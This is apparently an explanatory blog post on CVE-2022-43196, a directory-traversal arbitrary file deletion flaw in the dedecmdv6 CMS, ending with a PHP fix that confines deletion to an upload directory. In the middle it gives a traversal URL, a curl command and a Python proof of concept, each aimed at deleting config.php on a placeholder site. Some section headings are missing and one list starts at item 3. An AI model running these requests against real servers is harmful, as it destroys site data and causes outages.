The world of Content Management Systems (CMS) is big, but so are the risks. With new vulnerabilities popping up every day, both users and administrators have to stay alert. One such threat is CVE-2022-43196, which affects the dedecmdv6 CMS, version 6.1.9. This post breaks down what the bug is, how it works, and walks through a proof-of-concept exploit, all in plain language.

What is dedecmdv6?

dedecmdv6 is an open-source CMS that is popular in Chinese-speaking communities. It's used to manage things like news sites, blogs, and company websites.

About the Vulnerability

CVE-2022-43196 is a critical vulnerability that lets an attacker *delete any file* on the server (arbitrary file deletion). The problem lives in file_manage_control.php. This flaw happens because the file doesn’t properly check or filter parameters when handling file deletion. That means a hacker can send a crafted request to the server and delete sensitive files.

Below is a simplified snippet inspired by the real problem in file_manage_control.php:

// file_manage_control.php (simplified for clarity)
if ($_GET['action'] == 'delete') {
    // Attacker-controlled path, taken from the query string as-is
    $targetFile = $_GET['filename'];
    if (file_exists($targetFile)) {
        // No check that the path stays inside an allowed directory
        unlink($targetFile);
        echo "Deleted successfully.";
    } else {
        echo "File not found.";
    }
}

The problem here? The code takes the filename parameter straight from the user, with no validation, and deletes the file. This allows a hacker to delete ANY file on the server that the web server has permission to remove.

An attacker, usually after logging in (but sometimes even unauthenticated), visits the following URL:

http://victim-site.com/file_manage_control.php?action=delete&filename=../../../../important_file.php

Here, filename is set to ../../../../important_file.php, which uses directory traversal (the ../ bits) to move up the directory tree and target files outside the intended folder.

Below is a simple way to test this exploit using curl:

curl "http://victim-site.com/file_manage_control.php?action=delete&filename=../../../../config.php"

If the vulnerability exists, this will delete config.php if permissions allow.


Python PoC

import requests

target_url = 'http://victim-site.com/file_manage_control.php'
params = {
    'action': 'delete',
    'filename': '../../../../config.php'
}

r = requests.get(target_url, params=params)
print(r.text)



- Denial of Service (DoS): Deleting key files can take the whole site offline.
- Further attacks: Removing certain files might weaken security, allowing more attacks like privilege escalation.

Set directory restrictions: Only allow deletion inside a defined upload directory.

3. Update dedecmdv6: Check for a patch or update from the dedecms.com website (Chinese).
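
One way to implement the "only allow deletion inside a defined upload directory" restriction is to resolve the requested path and confirm it still sits under the allowed root before calling unlink(). This is an added example, not dedecmdv6 code and not the vendor's patch; the function name delete_inside() and the demo directory layout are assumptions.

```php
<?php
// Added example, not DedeCMS code: delete_inside() and the directory layout are assumptions.

/** Delete $requested only if it resolves to a regular file inside $baseDir. */
function delete_inside(string $baseDir, string $requested): bool
{
    $base = realpath($baseDir);
    // Reject empty names and NUL bytes before touching the filesystem.
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return false;
    }
    // realpath() collapses ../ and follows symlinks; false means no such path.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false) {
        return false;
    }
    // Trailing separator keeps a sibling such as "uploads_old" from matching "uploads".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return is_file($target) && unlink($target);
}

// Constructed demo tree under the system temp directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'delete_demo_' . bin2hex(random_bytes(4));
$uploads = $root . DIRECTORY_SEPARATOR . 'uploads';
mkdir($uploads, 0700, true);
file_put_contents($root . DIRECTORY_SEPARATOR . 'config.php', 'constructed');
file_put_contents($uploads . DIRECTORY_SEPARATOR . 'old.png', 'constructed');

foreach (['old.png', '../config.php', 'missing.png'] as $name) {
    $ok = delete_inside($uploads, $name);
    echo str_pad($name, 16), $ok ? 'deleted' : 'rejected', PHP_EOL;
}
echo 'config.php still present: ', var_export(file_exists("$root/config.php"), true), PHP_EOL;

// Clean up the demo tree.
unlink("$root/config.php");
rmdir($uploads);
rmdir($root);
```

The check compares resolved paths rather than searching the input for "../", so encoded or symlink-based variants that resolve outside the upload directory are rejected by the same test.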

Conclusion

CVE-2022-43196 in dedecmdv6 v6.1.9 is a classic yet dangerous example of what happens when user input is not properly checked. Server administrators should patch promptly, review file permissions, and always validate input in code.

Timeline

Published on: 11/23/2022 21:15:00 UTC
Last modified on: 11/28/2022 19:37:00 UTC